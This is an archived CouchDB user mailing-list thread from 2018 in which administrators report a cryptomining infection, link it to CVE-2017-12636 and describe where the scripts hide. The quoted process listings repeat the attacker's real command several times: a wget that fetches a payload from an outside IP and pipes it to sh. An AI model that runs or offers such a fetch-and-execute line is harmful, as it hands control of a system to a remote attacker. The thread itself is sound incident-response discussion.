You are viewing a plain text version of this content. The canonical link for it is here.
Posted to user@couchdb.apache.org by Michael Bykov <m....@gmail.com> on 2018/02/16 11:31:49 UTC
logo6
I see now in logs:
couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
/bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
\_ sh
couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
\_ sleep 60
couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
/usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
What shold be done?
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
Re: logo6
Posted by Brian Johnston | Owner | Alpine Tech Solutions <br...@usa.net>.
The hackers are changing the name of the script to other names like logo4. It
took my CouchDB down for a while and now has subsided. I searched the crontab
of all the accounts and could not find evidence there. They must have evolved
to another method of execution once it gets installed....
------ Original Message ------
Received: 06:15 AM MST, 02/22/2018
From: Michael Bykov <m....@gmail.com>
To: user@couchdb.apache.org
Subject: Re: logo6
2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rn...@apache.org>:
> sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
I have found malware script in crontab from user couchdb.
This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
And yes, my version was 1.6
>
>
> B.
>
> > On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
> >
> > Hi Michael,
> >
> > i have experienced the same - this is a mining script. You can find the
> shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?)
> installation. Finally i have moved to a new vm because the script could
> install itself again and again.
> >
> > Ingo
> >
> >> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
> >>
> >> I see now in logs:
> >>
> >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> >> \_ sh
> >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> >> \_ sleep 60
> >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
> >>
> >> What shold be done?
> >>
> >>
> >> --
> >> М.
> >>
> >> http://diglossa.ru
> >> xmpp://m.bykov@jabber.ru
> >
>
>
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
Re: logo6
Posted by Michael Bykov <m....@gmail.com>.
2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rn...@apache.org>:
> sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
I have found malware script in crontab from user couchdb.
This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
And yes, my version was 1.6
>
>
> B.
>
> > On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
> >
> > Hi Michael,
> >
> > i have experienced the same - this is a mining script. You can find the
> shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?)
> installation. Finally i have moved to a new vm because the script could
> install itself again and again.
> >
> > Ingo
> >
> >> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
> >>
> >> I see now in logs:
> >>
> >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> >> \_ sh
> >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> >> \_ sleep 60
> >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
> >>
> >> What shold be done?
> >>
> >>
> >> --
> >> М.
> >>
> >> http://diglossa.ru
> >> xmpp://m.bykov@jabber.ru
> >
>
>
--
М.
http://diglossa.ru
xmpp://m.bykov@jabber.ru
Re: logo6
Posted by Robert Samuel Newson <rn...@apache.org>.
sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
B.
> On 16 Feb 2018, at 11:50, Ingo Radatz <th...@googlemail.com> wrote:
>
> Hi Michael,
>
> i have experienced the same - this is a mining script. You can find the shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?) installation. Finally i have moved to a new vm because the script could install itself again and again.
>
> Ingo
>
>> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
>>
>> I see now in logs:
>>
>> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
>> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
>> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
>> \_ sh
>> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
>> \_ sleep 60
>> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
>> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
>>
>> What shold be done?
>>
>>
>> --
>> М.
>>
>> http://diglossa.ru
>> xmpp://m.bykov@jabber.ru
>
Re: logo6
Posted by Ingo Radatz <th...@googlemail.com>.
Hi Michael,
i have experienced the same - this is a mining script. You can find the shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?) installation. Finally i have moved to a new vm because the script could install itself again and again.
Ingo
> On 16. Feb 2018, at 12:31, Michael Bykov <m....@gmail.com> wrote:
>
> I see now in logs:
>
> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_
> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh
> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 |
> \_ sh
> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 |
> \_ sleep 60
> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_
> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
>
> What shold be done?
>
>
> --
> М.
>
> http://diglossa.ru
> xmpp://m.bykov@jabber.ru